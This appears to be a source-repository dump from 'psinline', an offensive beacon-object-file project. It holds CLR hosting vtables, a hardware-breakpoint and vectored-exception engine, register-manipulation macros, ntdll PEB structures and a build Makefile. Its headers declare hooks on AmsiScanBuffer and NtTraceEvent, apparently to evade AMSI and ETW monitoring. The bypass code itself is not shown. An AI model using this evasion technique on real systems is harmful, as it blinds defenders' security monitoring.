| ICLRMetaHost* This); 622 | 623 | ULONG(STDMETHODCALLTYPE* Release)( 624 | ICLRMetaHost* This); 625 | 626 | HRESULT(STDMETHODCALLTYPE* GetRuntime)( 627 | ICLRMetaHost* This, 628 | /* [in] */ LPCWSTR pwzVersion, 629 | /* [in] */ REFIID riid, 630 | /* [retval][iid_is][out] */ LPVOID* ppRuntime); 631 | 632 | HRESULT(STDMETHODCALLTYPE* GetVersionFromFile)( 633 | ICLRMetaHost* This, 634 | /* [in] */ LPCWSTR pwzFilePath, 635 | /* [size_is][out] */ 636 | __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer, 637 | /* [out][in] */ DWORD* pcchBuffer); 638 | 639 | HRESULT(STDMETHODCALLTYPE* EnumerateInstalledRuntimes)( 640 | ICLRMetaHost* This, 641 | /* [retval][out] */ IEnumUnknown** ppEnumerator); 642 | 643 | HRESULT(STDMETHODCALLTYPE* EnumerateLoadedRuntimes)( 644 | ICLRMetaHost* This, 645 | /* [in] */ HANDLE hndProcess, 646 | /* [retval][out] */ IEnumUnknown** ppEnumerator); 647 | 648 | HRESULT(STDMETHODCALLTYPE* RequestRuntimeLoadedNotification)( 649 | ICLRMetaHost* This, 650 | /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction); 651 | 652 | HRESULT(STDMETHODCALLTYPE* QueryLegacyV2RuntimeBinding)( 653 | ICLRMetaHost* This, 654 | /* [in] */ REFIID riid, 655 | /* [retval][iid_is][out] */ LPVOID* ppUnk); 656 | 657 | HRESULT(STDMETHODCALLTYPE* ExitProcess)( 658 | ICLRMetaHost* This, 659 | /* [in] */ INT32 iExitCode); 660 | 661 | END_INTERFACE 662 | } ICLRMetaHostVtbl; 663 | 664 | typedef struct _ICLRMetaHost 665 | { 666 | ICLRMetaHostVtbl* lpVtbl; 667 | } ICLRMetaHost; 668 | 669 | typedef struct ICorRuntimeHostVtbl 670 | { 671 | BEGIN_INTERFACE 672 | 673 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 674 | ICorRuntimeHost* This, 675 | /* [in] */ REFIID riid, 676 | /* [iid_is][out] */ 677 | __RPC__deref_out void** ppvObject); 678 | 679 | ULONG(STDMETHODCALLTYPE* AddRef)( 680 | ICorRuntimeHost* This); 681 | 682 | ULONG(STDMETHODCALLTYPE* Release)( 683 | ICorRuntimeHost* This); 684 | 685 | HRESULT(STDMETHODCALLTYPE* CreateLogicalThreadState)( 686 | ICorRuntimeHost* This); 687 | 688 | HRESULT(STDMETHODCALLTYPE* DeleteLogicalThreadState)( 689 | ICorRuntimeHost* This); 690 | 691 | HRESULT(STDMETHODCALLTYPE* SwitchInLogicalThreadState)( 692 | ICorRuntimeHost* This, 693 | /* [in] */ DWORD* pFiberCookie); 694 | 695 | HRESULT(STDMETHODCALLTYPE* SwitchOutLogicalThreadState)( 696 | ICorRuntimeHost* This, 697 | /* [out] */ DWORD** pFiberCookie); 698 | 699 | HRESULT(STDMETHODCALLTYPE* LocksHeldByLogicalThread)( 700 | ICorRuntimeHost* This, 701 | /* [out] */ DWORD* pCount); 702 | 703 | HRESULT(STDMETHODCALLTYPE* MapFile)( 704 | ICorRuntimeHost* This, 705 | /* [in] */ HANDLE hFile, 706 | /* [out] */ HMODULE* hMapAddress); 707 | 708 | HRESULT(STDMETHODCALLTYPE* GetConfiguration)( 709 | ICorRuntimeHost* This, 710 | /* [out] */ ICorConfiguration* *pConfiguration); 711 | 712 | HRESULT(STDMETHODCALLTYPE* Start)( 713 | ICorRuntimeHost* This); 714 | 715 | HRESULT(STDMETHODCALLTYPE* Stop)( 716 | ICorRuntimeHost* This); 717 | 718 | HRESULT(STDMETHODCALLTYPE* CreateDomain)( 719 | ICorRuntimeHost* This, 720 | /* [in] */ LPCWSTR pwzFriendlyName, 721 | /* [in] */ IUnknown* pIdentityArray, 722 | /* [out] */ IUnknown** pAppDomain); 723 | 724 | HRESULT(STDMETHODCALLTYPE* GetDefaultDomain)( 725 | ICorRuntimeHost* This, 726 | /* [out] */ IUnknown** pAppDomain); 727 | 728 | HRESULT(STDMETHODCALLTYPE* EnumDomains)( 729 | ICorRuntimeHost* This, 730 | /* [out] */ HDOMAINENUM* hEnum); 731 | 732 | HRESULT(STDMETHODCALLTYPE* NextDomain)( 733 | ICorRuntimeHost* This, 734 | /* [in] */ HDOMAINENUM hEnum, 735 | /* [out] */ IUnknown** pAppDomain); 736 | 737 | HRESULT(STDMETHODCALLTYPE* CloseEnum)( 738 | ICorRuntimeHost* This, 739 | /* [in] */ HDOMAINENUM hEnum); 740 | 741 | HRESULT(STDMETHODCALLTYPE* CreateDomainEx)( 742 | ICorRuntimeHost* This, 743 | /* [in] */ LPCWSTR pwzFriendlyName, 744 | /* [in] */ IUnknown* pSetup, 745 | /* [in] */ IUnknown* pEvidence, 746 | /* [out] */ IUnknown** pAppDomain); 747 | 748 | HRESULT(STDMETHODCALLTYPE* CreateDomainSetup)( 749 | ICorRuntimeHost* This, 750 | /* [out] */ IUnknown** pAppDomainSetup); 751 | 752 | HRESULT(STDMETHODCALLTYPE* CreateEvidence)( 753 | ICorRuntimeHost* This, 754 | /* [out] */ IUnknown** pEvidence); 755 | 756 | HRESULT(STDMETHODCALLTYPE* UnloadDomain)( 757 | ICorRuntimeHost* This, 758 | /* [in] */ IUnknown* pAppDomain); 759 | 760 | HRESULT(STDMETHODCALLTYPE* CurrentDomain)( 761 | ICorRuntimeHost* This, 762 | /* [out] */ IUnknown** pAppDomain); 763 | 764 | END_INTERFACE 765 | } ICorRuntimeHostVtbl; 766 | 767 | typedef struct _ICorRuntimeHost { 768 | ICorRuntimeHostVtbl* lpVtbl; 769 | } ICorRuntimeHost; 770 | 771 | #undef DUMMY_METHOD 772 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This) 773 | 774 | typedef struct _MethodInfoVtbl { 775 | BEGIN_INTERFACE 776 | 777 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 778 | IMethodInfo* This, 779 | /* [in] */ REFIID riid, 780 | /* [iid_is][out] */ 781 | __RPC__deref_out void** ppvObject); 782 | 783 | ULONG(STDMETHODCALLTYPE* AddRef)( 784 | IMethodInfo* This); 785 | 786 | ULONG(STDMETHODCALLTYPE* Release)( 787 | IMethodInfo* This); 788 | 789 | DUMMY_METHOD(GetTypeInfoCount); 790 | DUMMY_METHOD(GetTypeInfo); 791 | DUMMY_METHOD(GetIDsOfNames); 792 | DUMMY_METHOD(Invoke); 793 | 794 | DUMMY_METHOD(ToString); 795 | DUMMY_METHOD(Equals); 796 | DUMMY_METHOD(GetHashCode); 797 | DUMMY_METHOD(GetType); 798 | DUMMY_METHOD(MemberType); 799 | DUMMY_METHOD(name); 800 | DUMMY_METHOD(DeclaringType); 801 | DUMMY_METHOD(ReflectedType); 802 | DUMMY_METHOD(GetCustomAttributes); 803 | DUMMY_METHOD(GetCustomAttributes_2); 804 | DUMMY_METHOD(IsDefined); 805 | 806 | HRESULT(STDMETHODCALLTYPE* GetParameters)( 807 | IMethodInfo* This, 808 | SAFEARRAY** pRetVal); 809 | 810 | DUMMY_METHOD(GetMethodImplementationFlags); 811 | DUMMY_METHOD(MethodHandle); 812 | DUMMY_METHOD(Attributes); 813 | DUMMY_METHOD(CallingConvention); 814 | DUMMY_METHOD(Invoke_2); 815 | DUMMY_METHOD(IsPublic); 816 | DUMMY_METHOD(IsPrivate); 817 | DUMMY_METHOD(IsFamily); 818 | DUMMY_METHOD(IsAssembly); 819 | DUMMY_METHOD(IsFamilyAndAssembly); 820 | DUMMY_METHOD(IsFamilyOrAssembly); 821 | DUMMY_METHOD(IsStatic); 822 | DUMMY_METHOD(IsFinal); 823 | DUMMY_METHOD(IsVirtual); 824 | DUMMY_METHOD(IsHideBySig); 825 | DUMMY_METHOD(IsAbstract); 826 | DUMMY_METHOD(IsSpecialName); 827 | DUMMY_METHOD(IsConstructor); 828 | 829 | HRESULT(STDMETHODCALLTYPE* Invoke_3)( 830 | IMethodInfo* This, 831 | VARIANT obj, 832 | SAFEARRAY* parameters, 833 | VARIANT* ret); 834 | 835 | DUMMY_METHOD(returnType); 836 | DUMMY_METHOD(ReturnTypeCustomAttributes); 837 | DUMMY_METHOD(GetBaseDefinition); 838 | 839 | END_INTERFACE 840 | } MethodInfoVtbl; 841 | 842 | typedef struct _MethodInfo { 843 | MethodInfoVtbl* lpVtbl; 844 | } MethodInfo; 845 | 846 | typedef struct ICorConfigurationVtbl 847 | { 848 | BEGIN_INTERFACE 849 | 850 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 851 | ICorConfiguration* This, 852 | /* [in] */ REFIID riid, 853 | /* [iid_is][out] */ 854 | __RPC__deref_out void** ppvObject); 855 | 856 | ULONG(STDMETHODCALLTYPE* AddRef)( 857 | ICorConfiguration* This); 858 | 859 | ULONG(STDMETHODCALLTYPE* Release)( 860 | ICorConfiguration* This); 861 | 862 | HRESULT(STDMETHODCALLTYPE* SetGCThreadControl)( 863 | ICorConfiguration* This, 864 | /* [in] */ IGCThreadControl* pGCThreadControl); 865 | 866 | HRESULT(STDMETHODCALLTYPE* SetGCHostControl)( 867 | ICorConfiguration* This, 868 | /* [in] */ IGCHostControl* pGCHostControl); 869 | 870 | HRESULT(STDMETHODCALLTYPE* SetDebuggerThreadControl)( 871 | ICorConfiguration* This, 872 | /* [in] */ IDebuggerThreadControl* pDebuggerThreadControl); 873 | 874 | HRESULT(STDMETHODCALLTYPE* AddDebuggerSpecialThread)( 875 | ICorConfiguration* This, 876 | /* [in] */ DWORD dwSpecialThreadId); 877 | 878 | END_INTERFACE 879 | } ICorConfigurationVtbl; 880 | 881 | typedef struct _ICorConfiguration 882 | { 883 | ICorConfigurationVtbl* lpVtbl; 884 | }ICorConfiguration; 885 | 886 | typedef struct IGCThreadControlVtbl 887 | { 888 | BEGIN_INTERFACE 889 | 890 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 891 | IGCThreadControl* This, 892 | /* [in] */ REFIID riid, 893 | /* [iid_is][out] */ 894 | __RPC__deref_out void** ppvObject); 895 | 896 | ULONG(STDMETHODCALLTYPE* AddRef)( 897 | IGCThreadControl* This); 898 | 899 | ULONG(STDMETHODCALLTYPE* Release)( 900 | IGCThreadControl* This); 901 | 902 | HRESULT(STDMETHODCALLTYPE* ThreadIsBlockingForSuspension)( 903 | IGCThreadControl* This); 904 | 905 | HRESULT(STDMETHODCALLTYPE* SuspensionStarting)( 906 | IGCThreadControl* This); 907 | 908 | HRESULT(STDMETHODCALLTYPE* SuspensionEnding)( 909 | IGCThreadControl* This, 910 | DWORD Generation); 911 | 912 | END_INTERFACE 913 | } IGCThreadControlVtbl; 914 | 915 | typedef struct _IGCThreadControl 916 | { 917 | IGCThreadControlVtbl* lpVtbl; 918 | }IGCThreadControl; 919 | 920 | typedef struct IGCHostControlVtbl 921 | { 922 | BEGIN_INTERFACE 923 | 924 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 925 | IGCHostControl* This, 926 | /* [in] */ REFIID riid, 927 | /* [iid_is][out] */ 928 | __RPC__deref_out void** ppvObject); 929 | 930 | ULONG(STDMETHODCALLTYPE* AddRef)( 931 | IGCHostControl* This); 932 | 933 | ULONG(STDMETHODCALLTYPE* Release)( 934 | IGCHostControl* This); 935 | 936 | HRESULT(STDMETHODCALLTYPE* RequestVirtualMemLimit)( 937 | IGCHostControl* This, 938 | /* [in] */ SIZE_T sztMaxVirtualMemMB, 939 | /* [out][in] */ SIZE_T* psztNewMaxVirtualMemMB); 940 | 941 | END_INTERFACE 942 | } IGCHostControlVtbl; 943 | 944 | typedef struct _IGCHostControl 945 | { 946 | IGCHostControlVtbl* lpVtbl; 947 | } IGCHostControl; 948 | 949 | typedef struct IDebuggerThreadControlVtbl 950 | { 951 | BEGIN_INTERFACE 952 | 953 | HRESULT(STDMETHODCALLTYPE* QueryInterface)( 954 | IDebuggerThreadControl* This, 955 | /* [in] */ REFIID riid, 956 | /* [iid_is][out] */ 957 | __RPC__deref_out void** ppvObject); 958 | 959 | ULONG(STDMETHODCALLTYPE* AddRef)( 960 | IDebuggerThreadControl* This); 961 | 962 | ULONG(STDMETHODCALLTYPE* Release)( 963 | IDebuggerThreadControl* This); 964 | 965 | HRESULT(STDMETHODCALLTYPE* ThreadIsBlockingForDebugger)( 966 | IDebuggerThreadControl* This); 967 | 968 | HRESULT(STDMETHODCALLTYPE* ReleaseAllRuntimeThreads)( 969 | IDebuggerThreadControl* This); 970 | 971 | HRESULT(STDMETHODCALLTYPE* StartBlockingForDebugger)( 972 | IDebuggerThreadControl* This, 973 | DWORD dwUnused); 974 | 975 | END_INTERFACE 976 | } IDebuggerThreadControlVtbl; 977 | 978 | typedef struct _IDebuggerThreadControl { 979 | IDebuggerThreadControlVtbl* lpVtbl; 980 | } IDebuggerThreadControl; 981 | 982 | #endif //PSINLINE_CLR_H 983 | -------------------------------------------------------------------------------- /HwBpEngine.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by kali on 19/09/23. 3 | // 4 | 5 | #ifndef PSINLINE_HWBPENGINE_H 6 | #define PSINLINE_HWBPENGINE_H 7 | 8 | #include 9 | #include 10 | 11 | typedef struct _BP_LIST 12 | { 13 | DWORD Tid; 14 | PVOID Address; 15 | PVOID Function; 16 | BYTE Position; 17 | 18 | /* next in the list */ 19 | struct _BP_LIST* Next; 20 | } BP_LIST, *PBP_LIST; 21 | 22 | typedef struct _HWBP_ENGINE 23 | { 24 | /* Veh (Vectored Exception Handling) handle */ 25 | HANDLE Veh; 26 | 27 | /* first time adding hw bp. need to prepare register */ 28 | BYTE First; 29 | 30 | /* list of breakpoints */ 31 | PBP_LIST Breakpoints; 32 | } HWBP_ENGINE, *PHWBP_ENGINE; 33 | 34 | NTSTATUS HwBpEngineInit( 35 | OUT PHWBP_ENGINE Engine, 36 | IN PVOID Exception 37 | ); 38 | 39 | NTSTATUS HwBpEngineAdd( 40 | IN PHWBP_ENGINE Engine, 41 | IN DWORD Tid, 42 | IN PVOID Address, 43 | IN PVOID Function, 44 | IN BYTE Position 45 | ); 46 | 47 | NTSTATUS HwBpEngineRemove( 48 | IN PHWBP_ENGINE Engine, 49 | IN DWORD Tid, 50 | IN PVOID Address 51 | ); 52 | 53 | NTSTATUS HwBpEngineDestroy( 54 | IN PHWBP_ENGINE Engine 55 | ); 56 | 57 | #endif //PSINLINE_HWBPENGINE_H 58 | -------------------------------------------------------------------------------- /HwBpExceptions.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by kali on 19/09/23. 3 | // 4 | 5 | #ifndef PSINLINE_HWBPEXCEPTIONS_H 6 | #define PSINLINE_HWBPEXCEPTIONS_H 7 | 8 | #include 9 | 10 | #if defined( __x86_64__ ) || defined( _M_X64 ) 11 | 12 | #define EXCEPTION_DUMP( e ) \ 13 | PRINTF( \ 14 | "Exception: \n" \ 15 | " - Rip: %p \n" \ 16 | " - Rax: %p \n" \ 17 | " - Arg1: %p \n" \ 18 | " - Arg2: %p \n" \ 19 | " - Arg3: %p \n" \ 20 | " - Arg4: %p \n" \ 21 | " - Arg5: %p \n" \ 22 | " - Arg6: %p \n", \ 23 | e->ContextRecord->Rip, \ 24 | e->ContextRecord->Rax, \ 25 | e->ContextRecord->Rcx, \ 26 | e->ContextRecord->Rdx, \ 27 | e->ContextRecord->R8, \ 28 | e->ContextRecord->R9, \ 29 | *( PVOID* ) ( e->ContextRecord->Rsp + sizeof( PVOID ) * 5 ), \ 30 | *( PVOID* ) ( e->ContextRecord->Rsp + sizeof( PVOID ) * 6 ) \ 31 | ) 32 | 33 | #define EXCEPTION_SET_RIP( e, p ) e->ContextRecord->Rip = p 34 | #define EXCEPTION_SET_RET( e, r ) e->ContextRecord->Rax = r 35 | #define EXCEPTION_RESUME( e ) e->ContextRecord->EFlags = ( 1 << 16 ) 36 | #define EXCEPTION_GET_RET( e ) *( PVOID* ) ( e->ContextRecord->Rsp ) 37 | #define EXCEPTION_ADJ_STACK( e, i ) e->ContextRecord->Rsp += i 38 | #define EXCEPTION_ARG_1( e ) ( e->ContextRecord->Rcx ) 39 | #define EXCEPTION_ARG_2( e ) ( e->ContextRecord->Rdx ) 40 | #define EXCEPTION_ARG_3( e ) ( e->ContextRecord->R8 ) 41 | #define EXCEPTION_ARG_4( e ) ( e->ContextRecord->R9 ) 42 | #define EXCEPTION_ARG_5( e ) *( PVOID* ) ( e->ContextRecord->Rsp + sizeof( PVOID ) * 5 ) 43 | #define EXCEPTION_ARG_6( e ) *( PVOID* ) ( e->ContextRecord->Rsp + sizeof( PVOID ) * 6 ) 44 | #define EXCEPTION_ARG_7( e ) *( PVOID* ) ( e->ContextRecord->Rsp + sizeof( PVOID ) * 7 ) 45 | 46 | #elif defined(i386) || defined(__i386__) || defined(__i386) || defined(_M_IX86) 47 | 48 | #define EXCEPTION_ARG_1( e ) *( PVOID* )( e->ContextRecord->Esp + sizeof( PVOID ) * 1 ) 49 | #define EXCEPTION_ARG_2( e ) *( PVOID* )( e->ContextRecord->Esp + sizeof( PVOID ) * 2 ) 50 | #define EXCEPTION_ARG_3( e ) *( PVOID* )( e->ContextRecord->Esp + sizeof( PVOID ) * 3 ) 51 | #define EXCEPTION_ARG_4( e ) *( PVOID* )( e->ContextRecord->Esp + sizeof( PVOID ) * 4 ) 52 | #define EXCEPTION_ARG_5( e ) *( PVOID* )( e->ContextRecord->Esp + sizeof( PVOID ) * 5 ) 53 | #define EXCEPTION_ARG_6( e ) *( PVOID* )( e->ContextRecord->Esp + sizeof( PVOID ) * 6 ) 54 | #define EXCEPTION_ARG_7( e ) *( PVOID* )( e->ContextRecord->Esp + sizeof( PVOID ) * 7 ) 55 | 56 | #endif 57 | 58 | VOID HwBpExAmsiScanBuffer( 59 | IN OUT PEXCEPTION_POINTERS Exception 60 | ); 61 | 62 | VOID HwBpExNtTraceEvent( 63 | IN OUT PEXCEPTION_POINTERS Exception 64 | ); 65 | #endif //PSINLINE_HWBPEXCEPTIONS_H 66 | -------------------------------------------------------------------------------- /MakeFile: -------------------------------------------------------------------------------- 1 | BOFNAME := psinline 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | CC_x86 := i686-w64-mingw32-gcc 4 | GCC := gcc 5 | STRIP_x64 := x86_64-w64-mingw32-strip 6 | STRIP_x86 := i686-w64-mingw32-strip 7 | OPTIONS := -masm=intel -Wall -I include -Wl,--dynamicbase 8 | 9 | release: 10 | $(CC_x64) -c psinline.c -o $(BOFNAME).x64.o $(OPTIONS) 11 | $(STRIP_x64) --strip-unneeded $(BOFNAME).x64.o 12 | debug: 13 | $(CC_x64) -c psinline.c -o $(BOFNAME).x64.o $(OPTIONS) -DDEBUG 14 | clean: 15 | rm $(BOFNAME).x64.o -------------------------------------------------------------------------------- /Native.h: -------------------------------------------------------------------------------- 1 | #if !defined(_NTDLL_) 2 | #define _NTDLL_ 3 | 4 | #pragma warning( disable:4001 ) // level 4 error - nonstandard extension 'single line comment' was used 5 | #pragma warning( disable:4201 ) // level 4 error - nonstandard extension used : nameless struct/union - ANSI C violation 6 | #pragma warning( disable:4214 ) // level 4 error - nonstandard extension used : bit field types other than int - ANSI C violation 7 | 8 | #if defined(__ICL) 9 | #pragma warning ( disable : 344 ) 10 | #endif 11 | 12 | //#pragma pack( push, 8 ) 13 | 14 | #if defined(__cplusplus) 15 | extern "C" { 16 | #endif 17 | 18 | #include 19 | #include 20 | 21 | #if !defined(NTSTATUS) 22 | typedef LONG NTSTATUS; 23 | typedef NTSTATUS *PNTSTATUS; 24 | #endif 25 | 26 | #if !defined(SECURITY_STATUS) 27 | typedef LONG SECURITY_STATUS; 28 | #endif 29 | 30 | 31 | #define GDI_HANDLE_BUFFER_SIZE32 34 32 | #define GDI_HANDLE_BUFFER_SIZE64 60 33 | 34 | #if !defined(_M_X64) 35 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32 36 | #else 37 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64 38 | #endif 39 | 40 | typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32]; 41 | typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64]; 42 | typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; 43 | 44 | typedef struct _UNICODE_STRING 45 | { 46 | USHORT Length; 47 | USHORT MaximumLength; 48 | PWSTR Buffer; 49 | } UNICODE_STRING, *PUNICODE_STRING, **PPUNICODE_STRING; 50 | typedef const UNICODE_STRING *PCUNICODE_STRING; 51 | 52 | #define EXPORT_FN __declspec(dllexport) 53 | #define IMPORT_FN __declspec(dllimport) 54 | 55 | #define PAGE_SIZE 0x1000 56 | 57 | #define EXTERNAL extern "C" 58 | 59 | #ifndef UNREFERENCED_PARAMETER 60 | #define UNREFERENCED_PARAMETER(P) (P) 61 | #endif 62 | 63 | #include "ntstatus.h" 64 | 65 | typedef PVOID* PPVOID; 66 | 67 | typedef struct _STRING 68 | { 69 | USHORT Length; 70 | USHORT MaximumLength; 71 | PCHAR Buffer; 72 | } STRING; 73 | 74 | typedef struct _CURDIR 75 | { 76 | UNICODE_STRING DosPath; 77 | HANDLE Handle; 78 | } CURDIR, *PCURDIR; 79 | 80 | typedef struct _RTL_DRIVE_LETTER_CURDIR 81 | { 82 | USHORT Flags; 83 | USHORT Length; 84 | ULONG TimeStamp; 85 | STRING DosPath; 86 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 87 | 88 | #define RTL_MAX_DRIVE_LETTERS 32 89 | #define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 90 | 91 | typedef struct _RTL_USER_PROCESS_PARAMETERS 92 | { 93 | ULONG MaximumLength; 94 | ULONG Length; 95 | 96 | ULONG Flags; 97 | ULONG DebugFlags; 98 | 99 | HANDLE ConsoleHandle; 100 | ULONG ConsoleFlags; 101 | HANDLE StandardInput; 102 | HANDLE StandardOutput; 103 | HANDLE StandardError; 104 | 105 | CURDIR CurrentDirectory; 106 | UNICODE_STRING DllPath; 107 | UNICODE_STRING ImagePathName; 108 | UNICODE_STRING CommandLine; 109 | PVOID Environment; 110 | 111 | ULONG StartingX; 112 | ULONG StartingY; 113 | ULONG CountX; 114 | ULONG CountY; 115 | ULONG CountCharsX; 116 | ULONG CountCharsY; 117 | ULONG FillAttribute; 118 | 119 | ULONG WindowFlags; 120 | ULONG ShowWindowFlags; 121 | UNICODE_STRING WindowTitle; 122 | UNICODE_STRING DesktopInfo; 123 | UNICODE_STRING ShellInfo; 124 | UNICODE_STRING RuntimeData; 125 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 126 | 127 | ULONG EnvironmentSize; 128 | ULONG EnvironmentVersion; 129 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 130 | 131 | typedef struct _PEB_LDR_DATA 132 | { 133 | ULONG Length; 134 | BOOLEAN Initialized; 135 | HANDLE SsHandle; 136 | LIST_ENTRY InLoadOrderModuleList; 137 | LIST_ENTRY InMemoryOrderModuleList; 138 | LIST_ENTRY InInitializationOrderModuleList; 139 | PVOID EntryInProgress; 140 | BOOLEAN ShutdownInProgress; 141 | HANDLE ShutdownThreadId; 142 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 143 | 144 | typedef struct _PEB 145 | { 146 | BOOLEAN InheritedAddressSpace; 147 | BOOLEAN ReadImageFileExecOptions; 148 | BOOLEAN BeingDebugged; 149 | union 150 | { 151 | BOOLEAN BitField; 152 | struct 153 | { 154 | BOOLEAN ImageUsesLargePages : 1; 155 | BOOLEAN IsProtectedProcess : 1; 156 | BOOLEAN IsLegacyProcess : 1; 157 | BOOLEAN IsImageDynamicallyRelocated : 1; 158 | BOOLEAN SkipPatchingUser32Forwarders : 1; 159 | BOOLEAN SpareBits : 3; 160 | }; 161 | }; 162 | HANDLE Mutant; 163 | 164 | PVOID ImageBaseAddress; 165 | PPEB_LDR_DATA Ldr; 166 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 167 | PVOID SubSystemData; 168 | PVOID ProcessHeap; 169 | PRTL_CRITICAL_SECTION FastPebLock; 170 | PVOID AtlThunkSListPtr; 171 | PVOID IFEOKey; 172 | union 173 | { 174 | ULONG CrossProcessFlags; 175 | struct 176 | { 177 | ULONG ProcessInJob : 1; 178 | ULONG ProcessInitializing : 1; 179 | ULONG ProcessUsingVEH : 1; 180 | ULONG ProcessUsingVCH : 1; 181 | ULONG ProcessUsingFTH : 1; 182 | ULONG ReservedBits0 : 27; 183 | }; 184 | ULONG EnvironmentUpdateCount; 185 | }; 186 | union 187 | { 188 | PVOID KernelCallbackTable; 189 | PVOID UserSharedInfoPtr; 190 | }; 191 | ULONG SystemReserved[1]; 192 | ULONG AtlThunkSListPtr32; 193 | PVOID ApiSetMap; 194 | ULONG TlsExpansionCounter; 195 | PVOID TlsBitmap; 196 | ULONG TlsBitmapBits[2]; 197 | PVOID ReadOnlySharedMemoryBase; 198 | PVOID HotpatchInformation; 199 | PPVOID ReadOnlyStaticServerData; 200 | PVOID AnsiCodePageData; 201 | PVOID OemCodePageData; 202 | PVOID UnicodeCaseTableData; 203 | 204 | ULONG NumberOfProcessors; 205 | ULONG NtGlobalFlag; 206 | 207 | LARGE_INTEGER CriticalSectionTimeout; 208 | SIZE_T HeapSegmentReserve; 209 | SIZE_T HeapSegmentCommit; 210 | SIZE_T HeapDeCommitTotalFreeThreshold; 211 | SIZE_T HeapDeCommitFreeBlockThreshold; 212 | 213 | ULONG NumberOfHeaps; 214 | ULONG MaximumNumberOfHeaps; 215 | PPVOID ProcessHeaps; 216 | 217 | PVOID GdiSharedHandleTable; 218 | PVOID ProcessStarterHelper; 219 | ULONG GdiDCAttributeList; 220 | 221 | PRTL_CRITICAL_SECTION LoaderLock; 222 | 223 | ULONG OSMajorVersion; 224 | ULONG OSMinorVersion; 225 | USHORT OSBuildNumber; 226 | USHORT OSCSDVersion; 227 | ULONG OSPlatformId; 228 | ULONG ImageSubsystem; 229 | ULONG ImageSubsystemMajorVersion; 230 | ULONG ImageSubsystemMinorVersion; 231 | ULONG_PTR ImageProcessAffinityMask; 232 | GDI_HANDLE_BUFFER GdiHandleBuffer; 233 | PVOID PostProcessInitRoutine; 234 | 235 | PVOID TlsExpansionBitmap; 236 | ULONG TlsExpansionBitmapBits[32]; 237 | 238 | ULONG SessionId; 239 | 240 | ULARGE_INTEGER AppCompatFlags; 241 | ULARGE_INTEGER AppCompatFlagsUser; 242 | PVOID pShimData; 243 | PVOID AppCompatInfo; 244 | 245 | UNICODE_STRING CSDVersion; 246 | 247 | PVOID ActivationContextData; 248 | PVOID ProcessAssemblyStorageMap; 249 | PVOID SystemDefaultActivationContextData; 250 | PVOID SystemAssemblyStorageMap; 251 | 252 | SIZE_T MinimumStackCommit; 253 | 254 | PPVOID FlsCallback; 255 | LIST_ENTRY FlsListHead; 256 | PVOID FlsBitmap; 257 | ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)]; 258 | ULONG FlsHighIndex; 259 | 260 | PVOID WerRegistrationData; 261 | PVOID WerShipAssertPtr; 262 | PVOID pContextData; 263 | PVOID pImageHeaderHash; 264 | union 265 | { 266 | ULONG TracingFlags; 267 | struct 268 | { 269 | ULONG HeapTracingEnabled : 1; 270 | ULONG CritSecTracingEnabled : 1; 271 | ULONG SpareTracingBits : 30; 272 | }; 273 | }; 274 | } PEB, *PPEB; 275 | 276 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT 277 | { 278 | ULONG Flags; 279 | PSTR FrameName; 280 | } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; 281 | 282 | typedef const TEB_ACTIVE_FRAME_CONTEXT *PCTEB_ACTIVE_FRAME_CONTEXT; 283 | 284 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT_EX 285 | { 286 | TEB_ACTIVE_FRAME_CONTEXT BasicContext; 287 | PCSTR SourceLocation; // e.g. "c:\windows\system32\ntdll.dll" 288 | } TEB_ACTIVE_FRAME_CONTEXT_EX, *PTEB_ACTIVE_FRAME_CONTEXT_EX; 289 | 290 | typedef const TEB_ACTIVE_FRAME_CONTEXT_EX *PCTEB_ACTIVE_FRAME_CONTEXT_EX; 291 | 292 | #define TEB_ACTIVE_FRAME_FLAG_EXTENDED (0x00000001) 293 | 294 | // 17/3/2011 updated 295 | typedef struct _TEB_ACTIVE_FRAME 296 | { 297 | ULONG Flags; 298 | struct _TEB_ACTIVE_FRAME *Previous; 299 | PTEB_ACTIVE_FRAME_CONTEXT Context; 300 | } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; 301 | 302 | typedef const TEB_ACTIVE_FRAME *PCTEB_ACTIVE_FRAME; 303 | 304 | typedef struct _TEB_ACTIVE_FRAME_EX 305 | { 306 | TEB_ACTIVE_FRAME BasicFrame; 307 | PVOID ExtensionIdentifier; // use address of your DLL Main or something mapping in the address space 308 | } TEB_ACTIVE_FRAME_EX, *PTEB_ACTIVE_FRAME_EX; 309 | 310 | typedef const TEB_ACTIVE_FRAME_EX *PCTEB_ACTIVE_FRAME_EX; 311 | 312 | #define GDI_BATCH_BUFFER_SIZE 310 313 | 314 | typedef struct _GDI_TEB_BATCH { 315 | ULONG Offset; 316 | UCHAR Alignment[4]; 317 | ULONG_PTR HDC; 318 | ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; 319 | } GDI_TEB_BATCH,*PGDI_TEB_BATCH; 320 | 321 | 322 | typedef struct 